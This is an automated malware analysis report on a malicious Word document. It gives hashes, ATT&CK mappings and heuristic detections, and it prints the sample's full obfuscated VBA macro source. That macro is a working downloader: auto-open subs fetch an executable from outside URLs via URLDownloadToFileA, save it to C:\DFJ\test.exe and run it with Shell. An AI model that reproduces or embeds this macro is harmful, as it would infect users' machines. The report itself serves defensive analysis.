Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c1e0278f0815324a…

MALICIOUS

Office (OLE)

55.5 KB Created: 2014-07-12 10:47:00 Authoring application: Microsoft Office Word First seen: 2015-01-15
MD5: 7ae2926f7cce97241fda912c62a7e848 SHA-1: d9b02605eaa6ad4d195ecc47db2d966aacf4e05b SHA-256: c1e0278f0815324ad11c514b5344f2b1e160bc816b4f5ef1c8df22570e80e0c8
346 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

The sample contains VBA macros that leverage the URLDownloadToFile API to download a second-stage executable from a remote URL. The AutoOpen and Workbook_Open macros are triggered upon opening the document, initiating the download and execution process. The script attempts to download a file from 'httpds:YUBNJIKMLxe?dl=1' (reconstructed from obfuscated string) and save it as 'c:\DFJ\test.exe', indicating a downloader or droppper functionality.

Heuristics 11

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell "C:\DFJ" & "\test.exe"
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    "URLDownloadToFileA" _
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    Shell "C:\DFJ" & "\test.exe"
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.dropbox.com/s/bu0twjsal7rgno4/bola.exe?dl=1 Referenced by macro
    • http://fuseratre.honor.es/vim/cose/treta.exeReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3961 bytes
SHA-256: fd3b9d7bc465930a85237c101263c4a3be5391abc883291694e65a21281307dc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "YDUHNJSAUDYTSGAUHBDUAGYBHNJIMt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Rka54dsadsad3543ka()
EWUCW4354EsadasdOIRFWEPOUIFOPWERUOCFIWEJMRWFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub

Sub Auto_Open()
    h
End Sub
Sub jdadf(asdG As String)
DSJFSFJSUFHSJFSUAFJSAF
Shell "C:\DFJ" & "\test.exe"
End Sub

'https://www.dropbox.com/s/bu0twjsal7rgno4/bola.exe?dl=1

Sub h()
On Error Resume Next

 jdadf Replace("httpds:YUBNJIKMLxe?dl=1", "", "    ")
 
End Sub

Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub

Sub Rka543dsd543ka()
EWUCW4354EsddsOIRFWEPOUIFOPWERUOCFIWEJMRWFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub

Sub Rka543543ka()
EWUCW4354EOIRFWEPOUIFOPWERUOCFIWEJMRWFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub
'https://www.dropbox.com/s/bu0twjsal7rgno4/bola.exe?dl=1


Sub R1kaka()
EWUCWEOI2342434343234432RFWEPOUIFOPWERUOCFIWEJMRWFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub

Sub Rk23aka()
EWUCWEOIRFWEPO2323UIFOPWERUOCFIWEJMRWFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub


Sub Rkaka()
EWUCWEOIRFWEPOUIFOPWERUOCFIWEJMRWFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub

Attribute VB_Name = "Módulo1"
Declare Function a9dy8bSDSi7tdgASDOA8s7dgasO8DHanusd Lib "C:\Windows\System32\urlmon.dll                        " _
Alias _
"URLDownloadToFileA" _
(ByVal rx5vtyl2fsa•ªAš•š™f•ªAš•š™•ªAš•š™•ªAš•š™fsafa As Long, ByVal O•ªAš•š™dEQuQato As String, ByVal Ppvjvgt•ªAš•š™1I As String, ByVal •ªAš•š™ As Long, ByVal •ªAš•š™d As Long) As Long

Sub DSJFSFJSUFHSJFSUAFJSAF()
On Error Resume Next
MkDir "c:\DFJ"
Kill "C:\DFJ" & "\test.exe"
sdfdsjf
End Sub





Function sdfdsjf()
a9dy8bSDSi7tdgASDOA8s7dgasO8DHanusd 2 - 1 - 1, FJGDd & "", "" & hdfs, 2 - 1 - 1, 2 - 1 - 1

End Function


Sub Rk2jkjajksakjakjsksajjkasjkksakjksajkjksakjsajkksakjksajkjska3aka()
EWUCWEOIRFWEPO2323UIFOPWEdfaljdsfjdflsjñlkasfjklfdkjslahkfdskdfdhjfsddsRUOCFIWEJMRWFIORFasdasdaPJIOFOPIWERJOIWERJIOF4835
End Sub
Sub Rk23adosminutoska()
EWUCWEOIRFWEPO2323UIFOPWERUOCFIWEJMRWsdsdsadFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub
Sub Radsfddjdfajadfdfdjfjhkk23aka()
EWUCWEOIRFWEPO2323UIFOPWERUOCFIWEJMRdsddsdWFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub
Sub Rk23ak0983498038904243099804398043980439803934928008488949808042980803980803980808908098980a()
EWUCWEOIRFWEPO2323UIFOPWEaaaaaaRUOCFIWEJMRWFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub
Sub Rk23244323aka()
EWUCWEOIRFWEPO2323UdddddddIFOPWERUOCFIWEJMRWFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub
Sub Rk43423423aka()
EWUCWEOIRFWEPO232fff3UIFOPWERUOCFIWEJMRWFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub
Sub Rk23ak1111a()
EWUCWEOIRFWEPO2ssss323UIFOPWERUOCFIWEJMRWFIORFPJIdOFOPIWERJOIWERJIOF4835
End Sub
Sub Rk23999aka()
EWUCWEOIRFWEPO2323aasddssdsdsaIFOPWERUOCFIWEJMRWFIORFPJIOFOPIfdddfsdsgfWERJOIWERJIOF4835
End Sub
Sub Rk276763aka()
EWUCWEOIRFWEPO232asdasdasdad3UIFOPWERUOCFIWEJMRWFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub

Sub Rk2333aka()
EWUCWEOIRFWEPasdasdasdsdadsdsdsadsaO2323UIFOPWERUOCFIWEJMRWFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub
Sub Rk1223aka()
EWUCWEOIRFWEsdasdsdsasdadssadsdaPO2323UIFOPWERUOCFIWEJMRWFIORFPJIOFOPIWERJOIWERJIOF4835
End Sub

Attribute VB_Name = "Clase1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Módulo2"
Public Const FJGDd As String = "http://fuseratre.honor.es/vim/cose/treta.exe                                                        "
Public Const hdfs As String = "C:\DFJ" & "\test.exe"

Open this report in the interactive analyzer, or submit your own file for analysis.